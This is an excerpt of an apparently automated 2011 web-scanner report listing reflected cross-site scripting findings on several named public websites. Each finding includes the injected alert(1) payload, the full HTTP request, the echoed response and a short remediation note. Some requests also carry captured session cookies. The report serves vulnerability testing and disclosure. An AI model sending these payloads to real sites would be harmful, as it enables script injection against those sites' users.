<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <strong>bookmark.php7efed<script>alert(1)</script>ee0d16265bf</strong> ...[SNIP]...
4.113. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.addthis.com
Path: /bookmark.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19497"-alert(1)-"fe14a7cf82e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bookmark.php/19497"-alert(1)-"fe14a7cf82e HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:52:45 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/ Content-Length: 93974
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <script type="text/javascript"> var u = "/bookmark.php/19497"-alert(1)-"fe14a7cf82e"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _gat._get ...[SNIP]...
The value of the v request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29706"style%3d"x%3aexpression(alert(1))"3fa85094d5c was submitted in the v parameter. This input was echoed as 29706"style="x:expression(alert(1))"3fa85094d5c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /bookmark.php?v=2029706"style%3d"x%3aexpression(alert(1))"3fa85094d5c HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:52:47 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/ Content-Length: 93991
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <input type="hidden" id="source" name="source" value="bkm-2029706"style="x:expression(alert(1))"3fa85094d5c" /> ...[SNIP]...
4.115. http://www.brinked.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.brinked.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35421"><script>alert(1)</script>01d4208af54 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?35421"><script>alert(1)</script>01d4208af54=1 HTTP/1.1 Host: www.brinked.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <meta http-equiv="Content-Type" conten ...[SNIP]... <input type="hidden" name="url" value="../?35421"><script>alert(1)</script>01d4208af54=1" /> ...[SNIP]...
4.116. http://www.brinked.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.brinked.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f0e8d</script><script>alert(1)</script>164da3fbd1b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?f0e8d</script><script>alert(1)</script>164da3fbd1b=1 HTTP/1.1 Host: www.brinked.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4f2f"><script>alert(1)</script>42a734dfe42 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /newsd4f2f"><script>alert(1)</script>42a734dfe42/software/hosted/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 15:26:42 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sat, 05 Feb 2011 15:26:42 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=SOVVIITHY30MLQE1GHOSKHWATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 32887
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Software_HP_Welcome_Ad_1x1;key=/newsd4f2f"><script>alert(1)</script>42a734dfe42/software/h;kvarticleid=;kvauthor=;loc=300;grp=285504902" target="_blank"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bf881'-alert(1)-'c7d0e430718 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /newsbf881'-alert(1)-'c7d0e430718/software/hosted/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 15:26:43 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sat, 05 Feb 2011 15:26:43 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=E5L45LDGRZA11QE1GHPCKH4ATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 32837
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Software_HP_Welcome_Ad_1x1;key=/newsbf881'-alert(1)-'c7d0e430718/software/hosted/showArtic;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=945734015;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6465'-alert(1)-'291f947bd70 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/softwaref6465'-alert(1)-'291f947bd70/hosted/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 15:26:45 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sat, 05 Feb 2011 15:26:45 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=RD2TG501O4YWPQE1GHRSKH4ATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 32358
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/news/softwaref6465'-alert(1)-'291f947bd70/hosted/showArtic;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=389734246;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dab8a"><script>alert(1)</script>b614631af52 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/softwaredab8a"><script>alert(1)</script>b614631af52/hosted/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 15:26:45 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sat, 05 Feb 2011 15:26:45 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=J03AGR31Q5PQNQE1GHOSKHWATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 32408
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/news/softwaredab8a"><script>alert(1)</script>b614631af52/h;kvarticleid=;kvauthor=;loc=300;grp=731813626" target="_blank"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5dc63'-alert(1)-'4490bf86c41 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/software/hosted5dc63'-alert(1)-'4490bf86c41/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 15:26:49 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sat, 05 Feb 2011 15:26:49 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=VBUYZEOB41MHPQE1GHPSKHWATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 32813
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Software_HP_Welcome_Ad_1x1;key=/news/software/hosted5dc63'-alert(1)-'4490bf86c41/showArtic;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=173128278;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc0b8"><a%20b%3dc>325da676732 was submitted in the REST URL parameter 3. This input was echoed as cc0b8"><a b=c>325da676732 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /news/software/hostedcc0b8"><a%20b%3dc>325da676732/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 15:26:47 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sat, 05 Feb 2011 15:26:47 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=4DWIFQDDRQC2LQE1GHPSKH4ATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 32815
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Software_HP_Welcome_Ad_1x1;key=/news/software/hostedcc0b8"><a b=c>325da676732/showArticle;kvarticleid=;kvauthor=;loc=300;grp=695609622" target="_blank"> ...[SNIP]...
The value of the articleID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6576"><script>alert(1)</script>cebc826cf51 was submitted in the articleID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/software/hosted/showArticle.jhtml?articleID=225700573b6576"><script>alert(1)</script>cebc826cf51&subSection=Hosted+Software HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 15:26:52 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sat, 05 Feb 2011 15:26:52 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=AO4VIN1V3MUUNQE1GHPCKH4ATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 34103
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <link rel="canonical" href="http://www.informationweek.com/news/software/hosted/showArticle.jhtml?articleID=225700573b6576"><script>alert(1)</script>cebc826cf51"/> ...[SNIP]...
The value of the articleID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6fbfd'%3balert(1)//94414a05705 was submitted in the articleID parameter. This input was echoed as 6fbfd';alert(1)//94414a05705 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/software/hosted/showArticle.jhtml?articleID=2257005736fbfd'%3balert(1)//94414a05705&subSection=Hosted+Software HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 15:26:53 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sat, 05 Feb 2011 15:26:53 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=WB0PTHRLAGQ1PQE1GHRSKH4ATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 33678
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Software_HP_Welcome_Ad_1x1;key=2257005736fbfd';alert(1)//94414a05705+/news/software/hosted/showArticle/dhandler;kvarticleid=2257005736fbfd';alert(1)//94414a05705;kvauthor=;loc=100;target=_blank;grp=919541144;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f1a16<a>c35b1c1308c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /p-c0xFC9HiPwWw-f1a16<a>c35b1c1308c HTTP/1.1 Host: www.quantcast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html Content-Language: en Date: Sat, 05 Feb 2011 16:11:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; cha ...[SNIP]... <em> p-c0xFC9HiPwWw-f1a16<a>c35b1c1308c</em> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70e07"><a>827f9aea977 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /p-c0xFC9HiPwWw-70e07"><a>827f9aea977 HTTP/1.1 Host: www.quantcast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html Content-Language: en Date: Sat, 05 Feb 2011 16:11:34 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
4.127. http://www.rackspace.com/blog/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspace.com
Path: /blog/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3df87"><script>alert(1)</script>8c3dc7536d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3df87\"><script>alert(1)</script>8c3dc7536d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/?3df87"><script>alert(1)</script>8c3dc7536d=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... age-chatinvite-wrap" onclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/blog/?3df87\"><script>alert(1)</script>8c3dc7536d=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=2f0f5a423706ce3acae18c89','custclient','width=500,height=320');return false;"> ...[SNIP]...
4.128. http://www.rackspace.com/blogs/index.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspace.com
Path: /blogs/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32034"><script>alert(1)</script>0aa11522d95 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blogs/index.php?32034"><script>alert(1)</script>0aa11522d95=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... vite-wrap" onclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/blogs/index.php?32034"><script>alert(1)</script>0aa11522d95=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=2f0f5a42a9db35b45dd84769','custclient','width=500,height=320');return fal ...[SNIP]...
4.129. http://www.rackspace.com/forms/contactsales.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspace.com
Path: /forms/contactsales.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a26f"><script>alert(1)</script>18575b301b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /forms/contactsales.php?7a26f"><script>alert(1)</script>18575b301b2=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... ap" onclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/forms/contactsales.php?7a26f"><script>alert(1)</script>18575b301b2=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=2f0f5a4242353bda923acdd2','custclient','width=500,height=320');return fal ...[SNIP]...
